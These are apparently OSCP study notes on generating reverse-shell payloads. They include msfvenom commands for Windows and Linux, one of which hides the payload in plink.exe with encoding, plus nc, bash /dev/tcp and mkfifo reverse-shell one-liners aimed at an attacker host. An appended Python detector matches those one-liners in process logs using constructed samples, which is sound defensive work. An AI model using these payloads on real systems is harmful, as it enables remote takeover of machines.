oscp-study-notes

Generate shellcodes

Windows

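# x86 reverse TCP shell emitted as a Python variable named "shellcode",
# avoiding the bytes listed in -b
msfvenom -a x86 --platform Windows \
    -p windows/shell_reverse_tcp \
    -b '\x00\x40\x0a\x0d' \
    -f python -v shellcode \
    LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT

# Same payload as an .exe: plink.exe is the template (-x),
# encoded with 9 iterations of shikata_ga_nai, written to reverse.exe
msfvenom -p windows/shell_reverse_tcp -f exe \
    -e x86/shikata_ga_nai -i 9 \
    -x /usr/share/windows-binaries/plink.exe -o reverse.exe \
    LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT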

Generate shellcode with specified size in python format

msfvenom -a x86 --platform windows \
    -p windows/shell_reverse_tcp \
    -b '\x00\x40\x0a\x0d' \
    -s $PAYLOAD_SIZE \
    LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
    | msfvenom -a x86 --platform Windows -f python -v shellcode

Linux

# The platform must match the Linux payload
msfvenom -a x86 --platform linux \
    -p linux/x86/shell_reverse_tcp \
    -b '\x00\x40\x0a\x0d' \
    -f python -v shellcode \
    LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT

Reverse shell commands

nc $ATTACKER_IP 443 -e /bin/bash

If netcat is not on the target system:

/bin/bash -i >& /dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0>&1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER_IP $ATTACKER_PORT >/tmp/f
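
From the defender's side, the three one-liners above leave recognisable command-line strings. The following added example (not part of the original notes) flags them in process-execution logs; the log format, field names and sample lines are constructed, and it assumes the full command line is recorded as one string.

```python
import re

# One signature per reverse-shell one-liner listed above.
SIGNATURES = {
    "nc_exec": re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-e\s+\S+"),
    "bash_dev_tcp": re.compile(r"/dev/tcp/[^/\s]+/\d+"),
    "fifo_pipe_shell": re.compile(
        r"mkfifo\s+\S+.*\|\s*\S*sh\s+-i\b.*\|\s*(?:nc|ncat|netcat)\b"
    ),
}

# Constructed log lines in a hypothetical format:
#   "<timestamp> user=<name> cmd=<command line>"
# 192.0.2.10 is a documentation address (RFC 5737).
SAMPLE_LOG = """\
2024-05-01T10:00:01Z user=www-data cmd=nc 192.0.2.10 443 -e /bin/bash
2024-05-01T10:00:07Z user=admin cmd=nc -zv 192.0.2.10 22
2024-05-01T10:01:12Z user=www-data cmd=/bin/bash -i >& /dev/tcp/192.0.2.10/4444 0>&1
2024-05-01T10:02:30Z user=deploy cmd=rsync -a -e ssh /srv/app backup01:/srv/app
2024-05-01T10:03:44Z user=www-data cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.0.2.10 4444 >/tmp/f
2024-05-01T10:04:02Z user=build cmd=mkfifo /tmp/build.pipe
"""

def parse_line(line):
    """Split a log line into (timestamp, user, cmdline); None if malformed."""
    head, sep, cmd = line.partition(" cmd=")
    if not sep:
        return None
    ts, _, user = head.partition(" user=")
    return ts, user, cmd

def classify(cmdline):
    """Return the names of all signatures that match the command line."""
    return [name for name, rx in SIGNATURES.items() if rx.search(cmdline)]

def scan(log_text):
    """Return (timestamp, user, [signature names]) for every flagged line."""
    findings = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, user, cmd = parsed
        hits = classify(cmd)
        if hits:
            findings.append((ts, user, hits))
    return findings

if __name__ == "__main__":
    for ts, user, hits in scan(SAMPLE_LOG):
        print(ts, user, ",".join(hits))
```

The benign `nc -zv`, `rsync -e ssh` and plain `mkfifo` lines are included to show the signatures do not fire on ordinary administrative use of the same tools.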

Webshells

Commands


Last updated 5 years ago
